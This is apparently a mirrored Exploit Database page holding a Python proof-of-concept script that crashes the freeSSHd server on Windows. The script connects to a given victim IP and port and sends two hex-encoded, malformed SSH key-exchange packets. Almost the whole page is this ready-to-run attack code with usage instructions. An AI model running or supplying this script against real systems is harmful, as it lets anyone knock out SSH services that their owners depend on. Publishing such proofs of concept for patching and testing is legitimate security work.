freeSSHd – Denial of Service (PoC)

• Exploit Database
• 13 阅读

• 作者： Level
  日期： 2011-12-24
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18268/

• import sys, socket, binascii
  print "\n"
  print "----------------------------------------------------------------" 
  print "|FreeSSHd, Remote Denial of Service |" 
  print "|Level, Smash the Stack |" 
  print "----------------------------------------------------------------" 
  print "\n" 
  buf = [
   ("5353482d322e302d50755454595f4b695454590d0a0000027c065a3db5f2230f6aed834d36a6fa8"
   "55b1f140000009a6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d73686"
   "13235362c6469666669652d68656c6c6d616e2d67726f75702d65786368616e67652d736861312c6"
   "469666669652d68656c6c6d616e2d67726f757031342d736861312c6469666669652d68656c6c6d6"
   "16e2d67726f7570312d736861312c727361323034382d7368613235362c727361313032342d73686"
   "1310000000f7373682d7273612c7373682d6473730000009f6165733235362d6374722c616573323"
   "5362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657331393"
   "22d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d6362632c626"
   "c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c336465732d636"
   "2632c617263666f75723235362c617263666f75723132380000009f6165733235362d6374722c616"
   "5733235362d6362632c72696a6e6461656c2d636263406c797361746f722e6c69752e73652c61657"
   "33139322d6374722c6165733139322d6362632c6165733132382d6374722c6165733132382d63626"
   "32c626c6f77666973682d6374722c626c6f77666973682d6362632c336465732d6374722c3364657"
   "32d6362632c617263666f75723235362c617263666f75723132380000001f686d61632d736861312"
   "c686d61632d736861312d39362c686d61632d6d64350000001f686d61632d736861312c686d61632"
   "d736861312d39362c686d61632d6d6435000000096e6f6e652c7a6c6962000000096e6f6e652c7a6"
   "c696200000000000000000000000000aac55b402546"),
   ("0000010c061e000001005e04d639ec531b5b8623f7ea733be6cc59d6439a40bbca110e1c2d45902"
   "46cc2ef5deb76623f30c6181112c168ba4f1d253a6aebe45b6a5c496b59894233f4991c8969b68d4"
   "3261e03d768dccda76f935f185b3168626d07a3c496cfb760e3fba82fd10dd309fec54a67bbbb294"
   "5f316080d27768743c975d90728fc87b5b33774ed6e2ebf6106001d4f3342a8a83fd501b6b7cc7ac"
   "e537f3bb83f2f0ff21af624f9353ab3e1ee2c5eebd9b5c36579656ad5a5fec779c88665abf1ced55"
   "b8aa6272860e58c6c4482c1b83020e270487cf96b5cffffffff60534d770a69bcc1c71963827ba6e"
   "3fb8a0c06f3bf64c3d426e67d00d90c679ee26388d2ef69f7357f9b2a688b4527")
   ]
  def usage():
  print "usage: ./freesshd.py <victim_ip><victim_port>" 
  print "example: ./freesshd.py 192.168.1.22 22"
  def main(): 
  if len(sys.argv) != 3:
  usage()
  sys.exit()
   
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   
  HOST = sys.argv[1]
  PORT = int(sys.argv[2])
  s.connect((HOST,PORT))
  data = s.recv(1024)
  print data
  print "[*] Sending Payload...\n" 
  for i in range(0,len(buf)):
   s.send(binascii.unhexlify(buf[i]))
  print "[*] Closing Socket...\n" 
  s.close()
  if __name__ == "__main__":
  main()